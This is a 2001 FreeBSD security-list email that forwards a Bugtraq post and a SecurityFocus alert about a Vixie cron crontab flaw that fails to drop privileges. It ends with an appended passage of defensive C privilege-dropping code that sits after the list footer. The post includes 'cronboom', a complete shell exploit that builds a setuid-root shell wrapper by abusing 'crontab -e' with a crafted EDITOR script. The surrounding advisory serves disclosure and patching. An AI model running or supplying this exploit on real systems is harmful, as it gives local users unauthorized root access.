Date: Tue, 8 May 2001 20:13:07 +0200
From: Szilveszter Adam <sziszi@petra.hos.u-szeged.hu>
To: security@freebsd.org
Subject: Fwd: Vixie cron vulnerability
Message-ID: <20010508201307.A2613@petra.hos.u-szeged.hu>
Hello,

I hate to disturb, but... I cannot reproduce this, but... are we affected?
This looks like rather new...

----- Forwarded message from Cade Cairns <cairnsc@SECURITYFOCUS.COM> -----

X-Sender: <cairnsc@mail>
Date: Mon, 7 May 2001 16:08:49 -0600
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Cade Cairns <cairnsc@SECURITYFOCUS.COM>
Subject: Vixie cron vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings Bugtraqers,

Attached is a simple proof of concept for the vixie cron vulnerability
recently published in Debian Security Advisory DSA-054-1. The code was
written during SIA analysis of this vulnerability. Further information on
the vulnerability may be found in the SecurityFocus SIA commercial alert,
also attached to this message.

Cade Cairns
SecurityFocus
http://www.securityfocus.com/

#!/bin/sh
#
# cronboom - simple proof-of-concept exploit for vixie cron version 3.1pl1
#
# synopsis:
#   the crontab file maintenance program (crontab) fails to drop privileges
#   before invoking the editor under certain circumstances.
#
# description:
#   a serialization error exists in some versions of the file maintenance
#   program, crontab.  the vulnerability was introduced in versions which
#   were patched for a separate vulnerability in fall of 2000 (see Bugtraq
#   ID #1960).
#
#   when a parsing error occurs after a modification operation, crontab will
#   fail to drop privileges correctly for subsequent modification operations.
#   because the program is installed setuid root, it may be possible for a
#   local user to gain root privileges.
#
# affected versions:
#   cron_3.0pl1-57.2 distributed with Debian Linux 2.2.
#
#   note that copies of the program with the patch mentioned above are likely
#   to also be vulnerable.
#
# references:
#   http://www.securityfocus.com/bid/2687
#
# 05/07/01 cairnsc@securityfocus.com

CRONTAB=/usr/bin/crontab

if ! test -x $CRONTAB; then
    echo "** unable to locate crontab executable, exiting"
    exit 1
fi

cat > vcsh.c << EOF
#include <unistd.h>

int main()
{
    setuid(0);
    setgid(0);
    execl("/bin/sh", "sh", NULL);
}
EOF

echo "** compiling shell wrapper as $PWD/vcsh"
cc -o $PWD/vcsh $PWD/vcsh.c

if ! test -x $PWD/vcsh; then
    echo "** compilation failed, exiting"
    exit 1
fi

echo "** creating simple exploit script as $PWD/vcex.sh"
cat > vcex.sh << EOF
#!/bin/sh

sleep 1 && echo "foo" >> \$1

if test -f $PWD/vcboom; then
    chown root.root $PWD/vcsh
    chmod 4755 $PWD/vcsh
    rm $PWD/vcboom
else
    touch $PWD/vcboom
fi
EOF
chmod 0755 $PWD/vcex.sh

echo "** running $CRONTAB -e"
echo "**"
echo "** enter 'yes' at the first prompt, then enter 'no' at the second"
echo
(EDITOR=$PWD/vcex.sh $CRONTAB -e)
echo
echo "** done, the shell wrapper should be suid root"

exit 0

Thank you for using SecurityFocus.com's Security Intelligence Alert (SIA)
Service. To manage account please visit https://alerts.securityfocus.com/
For questions or comments email us at alerts@securityfocus.com.

---------------------------------------------------------------------------
Security Alert

Subject: Vixie Cron crontab Privilege Lowering Failure Vulnerability
BUGTRAQ ID: 2687
CVE ID: CVE-MAP-NOMATCH
Published: May 07, 2001
Updated: May 07, 2001
Remote: No
Local: Yes
Availability: User Initiated
Authentication: Not Required
Credibility: Vendor Confirmed
Ease: Exploit Available
Class: Serialization Error
Impact: 10.00
Severity: 6.90
Urgency: 7.59
Last Change: Initial analysis.
---------------------------------------------------------------------------

Vulnerable Systems:
  Paul Vixie Vixie Cron 3.0pl1
    + Debian Linux 2.2 sparc
    + Debian Linux 2.2 powerpc
    + Debian Linux 2.2 arm
    + Debian Linux 2.2 alpha
    + Debian Linux 2.2 68k
    + Debian Linux 2.2

Non-Vulnerable Systems:

Summary:
Local users can cause Vixie crontab to fail to drop privileges when editing
files. Can lead to full system compromise.
Impact:
Local users can manipulate crontab's lowering of privileges, leading to full
system compromise.

Technical Description:
Vixie cron is an implementation of the popular UNIX program that runs
user-specified programs at periodic scheduled times.

A serialization error exists in some versions of the crontab file maintenance
program. The vulnerability was introduced in versions which were patched for
a separate vulnerability in fall of 2000 (see Bugtraq ID #1960).

When a parsing error occurs after a modification operation, crontab will fail
to drop privileges correctly for subsequent modification operations. Because
the program is installed setuid root, it may be possible for a local user to
gain root privileges.

Attack Scenarios:
An attacker with local access must edit their crontab file and enter a line
that causes the parser to fail. The attacker must then enter 'yes' when
prompted as to whether he or she wishes to attempt to fix the error in the
file. This will cause the editor to be invoked again, but with full
privileges. The attacker could then execute arbitrary commands from the
editor, or overwrite otherwise protected system files.

Exploits:
During SIA analysis of this vulnerability, Cade Cairns
<cairnsc@securityfocus.com> wrote proof-of-concept exploit code.
http://www.securityfocus.com/data/vulnerabilities/exploits/cronboom.sh

Mitigating Strategies:
Restricting local access to the host may prevent unauthorized users from
exploiting this vulnerability. Restrict access to the cron facility to
trusted users via the /etc/cron.allow and /etc/cron.deny files (man crontab).
Solutions:
For Paul Vixie Vixie Cron 3.0pl1:

  Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb
  http://security.debian.org/dists/stable/updates/main/binary-alpha/cron_3.0pl1-57.3_alpha.deb

  Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb
  http://security.debian.org/dists/stable/updates/main/binary-arm/cron_3.0pl1-57.3_arm.deb

  Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb
  http://security.debian.org/dists/stable/updates/main/binary-i386/cron_3.0pl1-57.3_i386.deb

  Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb
  http://security.debian.org/dists/stable/updates/main/binary-m68k/cron_3.0pl1-57.3_m68k.deb

  Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb
  http://security.debian.org/dists/stable/updates/main/binary-powerpc/cron_3.0pl1-57.3_powerpc.deb

  Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb
  http://security.debian.org/dists/stable/updates/main/binary-sparc/cron_3.0pl1-57.3_sparc.deb

Credit:
Posted to Bugtraq in a Debian Security Advisory (DSA-054-1) on May 7, 2001.

References:
advisory: Debian DSA-054-1: cron
http://www.securityfocus.com/advisories/3282

ChangeLog:
May 07, 2001: Initial analysis.

---------------------------------------------------------------------------
HOW TO INTERPRET THIS ALERT

BUGTRAQ ID: This is a unique identifier assigned to the vulnerability by
  SecurityFocus.com.
CVE ID: This is a unique identifier assigned to the vulnerability by the CVE.
Published: The date the vulnerability was first made public.
Updated: The date the information was last updated.
Remote: Whether this is a remotely exploitable vulnerability.
Local: Whether this is a locally exploitable vulnerability.
Credibility: Describes how credible the information about the vulnerability
  is. Possible values are:
    Conflicting Reports: There are multiple conflicting reports about the
      existence of the vulnerability.
    Single Source: There is a single non-reliable source reporting the
      existence of the vulnerability.
    Reliable Source: There is a single reliable source reporting the
      existence of the vulnerability.
    Conflicting Details: There is consensus on the existence of the
      vulnerability but not its details.
    Multiple Sources: There is consensus on the existence and details of the
      vulnerability.
    Vendor Confirmed: The vendor has confirmed the vulnerability.
Class: The class of vulnerability. Possible values are: Boundary Condition
  Error, Access Validation Error, Origin Validation Error, Input Validation
  Error, Failure to Handle Exceptional Conditions, Race Condition Error,
  Serialization Error, Atomicity Error, Environment Error, and Configuration
  Error.
Ease: Rates how easily the vulnerability can be exploited. Possible values
  are: No Exploit Available, Exploit Available, and No Exploit Required.
Impact: Rates the impact of the vulnerability. Its range is 1 through 10.
Severity: Rates the severity of the vulnerability. Its range is 1 through 10.
  It is computed from the impact rating and remote flag. Remote
  vulnerabilities with a high impact rating receive a high severity rating.
  Local vulnerabilities with a low impact rating receive a low severity
  rating.
Urgency: Rates how quickly you should take action to fix or mitigate the
  vulnerability. Its range is 1 through 10. It is computed from the severity
  rating, the ease rating, and the credibility rating. High severity
  vulnerabilities with a high ease rating, and a high confidence rating have
  a higher urgency rating. Low severity vulnerabilities with a low ease
  rating, and a low confidence rating have a lower urgency rating.
Last Change: The last change made to the vulnerability information.
Vulnerable Systems: The list of vulnerable systems. A '+' preceding a system
  name indicates that one of the system components is vulnerable. For
  example, Windows 98 ships with Internet Explorer. So if a vulnerability is
  found in IE you may see something like:
    Microsoft Internet Explorer
    + Microsoft Windows 98
Non-Vulnerable Systems: The list of non-vulnerable systems.
Summary: A concise summary of the vulnerability.
Impact: The impact of the vulnerability.
Technical Description: The in-depth description of the vulnerability.
Attack Scenarios: Ways an attacker may make use of the vulnerability.
Exploits: Exploit instructions or programs.
Mitigating Strategies: Ways to mitigate the vulnerability.
Solutions: Solutions to the vulnerability.
Credit: Information about who disclosed the vulnerability.
References: Sources of information on the vulnerability.
Related Resources: Resources that might be of additional value.
ChangeLog: History of changes to the vulnerability record.
---------------------------------------------------------------------------
Copyright 2001 SecurityFocus.com

----- End forwarded message -----

--
Regards:

Szilveszter ADAM
Szeged University
Szeged Hungary

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
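The advisory's Technical Description boils down to one missing step on one code path: a setuid-root crontab re-invokes the user's editor after a parse error without first dropping to the invoking user. The block below is an added example, not crontab's code and not from the advisory, of the discipline that closes that class of bug: every editor invocation goes through a single routine that drops privileges permanently, verifies the drop took effect, and only then execs. The function names drop_privileges, privileges_dropped and edit_as_user are hypothetical.

```c
/* Added example (not crontab's own code): drop privileges permanently before
 * every editor invocation, including a re-edit after a parse error. */
#define _GNU_SOURCE
#include <grp.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop to uid/gid. Order matters: groups, then gid, then uid,
 * since once the uid is unprivileged the other two calls are refused.
 * Returns 0 on success, -1 (errno set) on any failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(1, &gid) != 0) /* only root may do this */
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    return 0;
}

/* Confirm the drop is real and irreversible: real and effective ids match
 * the target and, for an unprivileged target, setuid(0) is refused. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid) return 0;
    if (getgid() != gid || getegid() != gid) return 0;
    if (uid != 0 && setuid(0) == 0) return 0; /* regained root: not dropped */
    return 1;
}

/* Run the editor on the scratch copy as the invoking user. Every edit path
 * (first edit and any "fix the error?" re-edit) goes through here, so no
 * code path can start the editor with root still in effect. Returns the
 * editor's exit status, 127 if the drop or exec failed, -1 on fork/wait error. */
int edit_as_user(const char *editor, const char *path, uid_t uid, gid_t gid)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges(uid, gid) != 0 || !privileges_dropped(uid, gid))
            _exit(127); /* never exec with privileges still held */
        execlp(editor, editor, path, (char *)NULL);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Run as an ordinary user the drop is a no-op but the verification still passes; the point is that a failed or skipped drop aborts before exec rather than silently handing the editor root.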